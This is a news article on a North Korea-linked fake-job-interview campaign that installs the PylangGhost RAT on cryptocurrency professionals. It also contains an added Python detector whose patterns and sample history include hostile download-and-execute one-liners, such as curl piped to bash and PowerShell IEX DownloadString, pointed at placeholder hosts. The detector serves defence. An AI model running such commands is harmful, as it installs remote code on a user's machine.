North Korean Malware Campaign Targets Cryptocurrency Professionals


A newly uncovered malware campaign linked to North Korea is targeting blockchain and cryptocurrency professionals with a Python-based Remote Access Trojan (RAT) called PylangGhost.

According to Cisco Talos, the group behind the attack, known as “Famous Chollima” or Wagemole, is using fake job listings to lure victims. These listings impersonate trusted crypto companies such as Coinbase, Robinhood, and Uniswap, drawing in job seekers with remote development roles.

Fake Interviews Turn Into Full-System Breaches

Once candidates apply, they are directed to a counterfeit recruitment site for a skills test. They are then scheduled for a fake video interview where they are asked to enable their camera and microphone.

During the call, the attackers tell the candidate to copy and paste a command into a terminal, claiming it installs video drivers needed for the interview. The command actually downloads and installs PylangGhost, giving the attackers remote control of the victim’s machine.

PylangGhost harvests cookies, saved credentials and wallet data from over 80 browser extensions and password managers, including MetaMask, 1Password, Phantom, NordPass, TronLink, and Bitski. It also captures screenshots, exfiltrates files, collects system information, and establishes persistence so the attackers keep their access.
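The paste-this-command lure described above leaves a trace in the one place the victim cannot avoid: the command that was actually run. The following Python script is an added example, not code from the original article or from Cisco Talos. It scans shell or PowerShell command lines (a constructed sample history is embedded) for download-and-execute shapes such as a remote script piped into a shell, a base64-decoded payload piped into a shell, or a PowerShell encoded command. The indicator patterns and the sample commands are assumptions for illustration; the page does not reproduce the commands used in the campaign.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Indicators of a "download and execute" one-liner, the shape of command a fake
# interviewer can ask a candidate to paste. These patterns are an assumption for
# this example; the article does not reproduce the commands used in the campaign.
DOWNLOAD_EXEC_PATTERNS = [
    (r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b",
     "remote script piped straight into a shell"),
    (r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?python[23]?\b",
     "remote script piped straight into python"),
    (r"\bbase64\s+(-d|--decode)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b",
     "base64-decoded payload piped into a shell"),
    (r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b",
     "PowerShell launched with an encoded command"),
    (r"\b(iex|invoke-expression)\b.*\b(downloadstring|invoke-webrequest|iwr)\b"
     r"|\b(downloadstring|invoke-webrequest|iwr)\b.*\b(iex|invoke-expression)\b",
     "PowerShell downloads content and evaluates it"),
    (r"\b(curl|wget)\b[^|]*(;|&&)\s*(unzip|tar|7z)\b.*(;|&&)\s*(python[23]?|bash|sh|node)\b",
     "download, unpack, then run the unpacked content"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), why) for p, why in DOWNLOAD_EXEC_PATTERNS]


@dataclass
class Finding:
    line_no: int        # 1-based position in the scanned history
    command: str
    reasons: List[str]


def flag_command(cmd: str) -> List[str]:
    """Return every reason a single command line looks like a paste-and-run lure."""
    return [why for rx, why in COMPILED if rx.search(cmd)]


def scan_history(lines: Iterable[str]) -> List[Finding]:
    """Scan shell-history or process command lines; return only the suspicious entries."""
    findings = []
    for n, line in enumerate(lines, start=1):
        reasons = flag_command(line)
        if reasons:
            findings.append(Finding(n, line.rstrip("\n"), reasons))
    return findings


# Constructed sample history: ordinary developer commands mixed with lure-shaped ones.
# The hostnames use the reserved .invalid TLD; nothing here is a real indicator.
SAMPLE_HISTORY = [
    "ls -la ~/Projects",
    "git pull origin main",
    "curl -fsSL https://example.invalid/camera-fix.sh | bash",
    "wget -qO- https://example.invalid/driver | python3 -",
    "echo aW1wb3J0IG9z | base64 -d | sh",
    "powershell -nop -w hidden -enc SQBFAFgA",
    "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/vd.ps1')\"",
    "curl -o /tmp/drv.zip https://example.invalid/drv.zip && unzip -o /tmp/drv.zip -d /tmp/drv && python3 /tmp/drv/setup.py",
    "npm install",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.command}")
        for why in f.reasons:
            print(f"    - {why}")
```

Run it against `~/.bash_history`, `~/.zsh_history` or exported process-creation logs rather than the embedded sample; a legitimate driver installer almost never needs a remote script fed into an interpreter, so a hit here during or just after a "video interview" deserves a look at what the command fetched.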

The attackers’ aim is twofold: to steal credentials and, potentially, funds from individual victims, and to get their own operatives hired as remote employees at legitimate companies, which gives them long-term access to those firms’ confidential data and software architecture.

So far the campaign has mainly hit professionals in India, where demand for blockchain talent is high and remote work is the norm in the industry.

The Real Crypto Threat? Governments Exploiting the Industry

The PylangGhost campaign is just one part of a broader trend involving highly targeted cyberattacks by North Korean actors against the cryptocurrency industry.

Pyongyang uses these schemes to fund its nuclear and ballistic missile programs.

As previously reported on EconomyWatch, North Korea-linked hackers were responsible for approximately 61% of the value stolen in crypto thefts worldwide in 2024, about $1.34 billion according to Chainalysis.

Previous campaigns included Zoom calls with fake venture capitalists, during which the attackers staged audio glitches and then offered a “fix” that was actually malware disguised as a software update.

North Korean groups such as BlueNoroff have taken this further, using deepfake video calls to impersonate senior executives and trick crypto founders, particularly macOS users, into executing malicious instructions.

Shell companies such as Blocknovas LLC, Softglide LLC, and Angeloper Agency have also played a role, luring developers into running information-stealing malware such as BeaverTail and the InvisibleFerret backdoor. Although the FBI has seized Blocknovas’s domain, other fronts remain active, showing how adaptable these operations are.

https://twitter.com/AkwyZ/status/1935632903200731399

State-linked attacks on crypto aren’t limited to North Korea. In Iran, a roughly $90 million hack of the exchange Nobitex by pro-Israeli operatives led the government to impose new restrictions on domestic crypto exchanges. These incidents underscore the need for constant vigilance, strong authentication, and routine system audits.

As the threat landscape evolves, the biggest danger to the crypto world is no longer just market volatility; it is increasingly highly organised, often state-backed, global cybercrime.

About Jimmy Aki

Based in the UK, Jimmy is an economic researcher with outstanding hands-on and heads-on experience in macroeconomic finance analysis, forecasting and planning. He has honed his skills working cross-continentally as a finance analyst, which gives him inter-cultural experience. He currently has a strong passion for regulation and macroeconomic trends, as it allows him to peek under the global bonnet to see how the world works.